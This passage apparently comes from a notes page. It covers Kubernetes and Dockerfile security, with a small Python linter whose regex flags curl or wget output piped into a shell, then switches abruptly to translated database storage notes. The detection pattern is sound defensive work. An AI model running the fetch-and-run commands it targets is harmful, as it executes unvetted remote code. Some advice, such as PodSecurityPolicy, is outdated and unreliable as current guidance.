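        image,
    ]


if __name__ == "__main__":
    print(" ".join(hardened_run_args("alpine:3.19")))
```

The list can be passed to subprocess.run as is; an application that writes to disk would additionally need a --tmpfs or volume mount for its writable paths.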

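Kubernetes security best practices

For RBAC, assign Roles and ClusterRoles to specific users or groups instead of granting cluster-admin to any user or group.
Avoid duplicated permissions when using Kubernetes RBAC, since they can cause operational problems.
Remove unused or inactive RBAC roles so that attention stays on the active ones when troubleshooting or investigating security incidents.
Use Kubernetes network policies to isolate Pods and explicitly allow only the communication paths the application needs. Otherwise you are exposed to both lateral and north-south threats.
If Pods need Internet access (ingress or egress), create a network policy that enforces the right segmentation and firewall rules, create the label that the policy targets, and then attach that label to the Pods.
Use the PodSecurityPolicy admission controller to make sure appropriate governance policies are enforced. It can prevent containers from running as root or require the container's root file system to be mounted read-only (these recommendations should sound familiar from the Docker checklist above).
Use a Kubernetes admission controller to enforce an image registry policy so that images pulled from untrusted registries are rejected automatically.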
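The kind of rule such an admission policy enforces can be approximated offline by inspecting a Pod manifest. The sketch below works on a manifest already loaded into a dict (for example from kubectl get pod -o json); the function name pod_findings is hypothetical, and only container-level securityContext fields are checked, so settings inherited from the Pod-level securityContext are not taken into account.

```python
def pod_findings(pod):
    """List settings in a Pod manifest that weaken container isolation."""
    findings = []
    spec = pod.get("spec", {})
    for field in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(field):
            findings.append(field)
    for container in spec.get("containers", []):
        name = container.get("name", "?")
        sc = container.get("securityContext") or {}
        if sc.get("privileged"):
            findings.append(f"{name}: privileged")
        if not sc.get("runAsNonRoot"):
            findings.append(f"{name}: runAsNonRoot not set")
        if not sc.get("readOnlyRootFilesystem"):
            findings.append(f"{name}: root filesystem writable")
        if sc.get("allowPrivilegeEscalation", True):  # treated as allowed unless disabled
            findings.append(f"{name}: allowPrivilegeEscalation not disabled")
    return findings
```

An empty list means the manifest passes these particular checks, not that the workload is secure.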

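Security questions

How many images on the host were last scanned more than 60 days ago?
How many images/containers have high-severity vulnerabilities?
Which deployments are affected by those highly vulnerable containers?
Do any containers in the affected deployments store secrets?
Are any vulnerable containers running as root or with the privileged flag?
Are there vulnerable containers in Pods that have no associated network policy (meaning all traffic is allowed)?
Are any containers running in production affected by this vulnerability?
Where do the images we use come from?
How do we block images pulled from untrusted registries?
Can we see which processes are executing at container runtime?
Which clusters, namespaces, and nodes do not comply with the CIS benchmarks for Docker and Kubernetes?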

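Things to watch for in a Dockerfile

Make sure a USER is specified
Make sure the base image version is pinned
Make sure operating system package versions are pinned
Avoid ADD; prefer COPY
Avoid apt/apk upgrade
Avoid using curl in a RUN instruction to fetch and run bash scripts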
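Most of the checks in this list are mechanical enough to script. The following is a rough sketch of such a linter: the function name lint_dockerfile and the regular expressions are hypothetical, multi-line RUN instructions joined with backslashes are not handled, and package version pinning is not checked.

```python
import re


def lint_dockerfile(text):
    """Apply a few of the Dockerfile checks listed above and return the findings."""
    findings = []
    lines = [l.strip() for l in text.splitlines()
             if l.strip() and not l.strip().startswith("#")]
    if not any(l.upper().startswith("USER ") for l in lines):
        findings.append("no USER instruction")
    for line in lines:
        upper = line.upper()
        if upper.startswith("FROM "):
            # Skip options such as --platform=... to find the image reference.
            image = next((t for t in line.split()[1:] if not t.startswith("--")), "")
            if ":" not in image or image.endswith(":latest"):
                findings.append(f"unpinned base image: {image}")
        elif upper.startswith("ADD "):
            findings.append("ADD used; prefer COPY")
        elif upper.startswith("RUN "):
            if re.search(r"\b(apt(-get)?|apk)\s+(-\S+\s+)*(dist-)?upgrade\b", line):
                findings.append("package upgrade in RUN")
            if re.search(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b", line):
                findings.append("remote script piped into a shell")
    return findings
```

Dedicated static analysis tools cover far more cases; the point here is only that each rule corresponds to a pattern that can be checked automatically at build time.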

Static analysis tools

k8s config scanning tools

Store model data layout and system catalogs

This part is translated from online sources and will be tidied up later.

Data organization
An in-memory database can be thought of as one large byte array. The database uses the schema to convert the bytes to the appropriate type. Every tuple has a header that contains metadata. Storing tuples as fixed-length data makes it easy to compute where a tuple starts.

Main content
- Type representation
- Data layout / alignment
- Storage models
- System catalogs

Data representation
- INTEGER/BIGINT/SMALLINT/TINYINT: C/C++ representation
- FLOAT/REAL vs. NUMERIC/DECIMAL: IEEE-754 standard / fixed-point decimals
- TIME/DATE/TIMESTAMP: 32/64-bit count of seconds, milliseconds, or microseconds since the UNIX epoch
- VARCHAR/VARBINARY/TEXT/CLOB: if the value is 64 bits or larger, the tuple points to another location; a header holds the length and the address of the next location, followed by the data

Variable-precision numeric types are generally faster than arbitrary-precision numbers. Fixed-precision numbers (NUMERIC/DECIMAL) need additional metadata to be stored. Variable-length fields, for example VARCHAR(128).

Byte alignment has a large effect on performance (insert workload):
- Unaligned: 0.523 MB/s
- Alignment plus padding: 11.7 MB/s
- Alignment plus reordering: 814.8 MB/s

Storage models

Row storage: n-ary storage model (NSM)
- The DBMS stores all attributes of a tuple contiguously.
- Suitable for OLTP workloads.
- Uses the one-tuple-at-a-time iterator model.
- Advantages: fast inserts, updates, and deletes; good for queries that need the entire tuple; can use index-oriented storage.
- Disadvantage: poor for queries that scan only some of the attributes.
- Physical storage: heap tables, index tables.

Column storage: decomposed storage model (DSM)
- One attribute of all tuples is stored contiguously.
- Suitable for OLAP workloads.
- Uses the one-vector-at-a-time iterator model.
- Advantages: less data to read, better compression.
- Disadvantages: point queries, inserts, updates, and deletes are slower because tuples have to be split and stitched back together.

Hybrid storage
- Data is hot when it is first inserted (it is likely to be updated again soon). The older a tuple gets, the less often it is updated.
- A single logical database instance uses different storage models for hot and cold data: NSM for fast OLTP, with data migrated to DSM for more efficient OLAP.
- Option 1: separate execution engines: mirrors (Oracle/IBM), delta store (HANA)
- Option 2: a single flexible architecture: adaptive storage

System catalogs
- Almost all databases store the catalog the same way as regular data.
- The DBMS has to be transaction-aware and automatically support DDL alongside concurrent transactions.
- Add column: NSM copies the tuples to a new region; DSM adds a new column segment.
- Drop column: NSM copies the tuples to a new region or marks the column as obsolete; DSM drops the column segment.
- Create index: scan the entire table and populate the index while recording the changes made in the meantime. When the scan finishes, lock the table and resolve the changed records.
- Drop index: drop the index logically; all transactions that are still executing must remain able to update it.
- Sequences: they are not covered by the usual isolation protection, and rolling back a transaction does not roll back the sequence; otherwise every insert would run into write conflicts.

Thoughts
- We have abandoned the hybrid storage model: it is a huge amount of work, and delta version storage plus column storage is basically equivalent.
- The system catalog is very hard to get right.
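The effect of attribute order on padding can be observed with Python's struct module, which follows the platform's native alignment rules in "@" mode. This is an illustrative sketch; the four-attribute schema is made up, and the aligned sizes depend on the platform.

```python
import struct

# Hypothetical tuple schema: char, int64, int16, int32 (struct codes c, q, h, i).
declared = "cqhi"    # attributes in the order the schema declares them
reordered = "qihc"   # same attributes, largest first

packed = struct.calcsize("=" + declared)              # no padding at all
aligned = struct.calcsize("@" + declared)             # native alignment, padding inserted
aligned_reordered = struct.calcsize("@" + reordered)  # native alignment after reordering

print("packed:", packed)
print("aligned, declared order:", aligned)
print("aligned, reordered:", aligned_reordered)
```

On a typical x86-64 build the declared order needs padding after the char and after the int16, while the reordered layout keeps every attribute aligned with little or no padding. That is the idea behind the "alignment plus reordering" case above.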
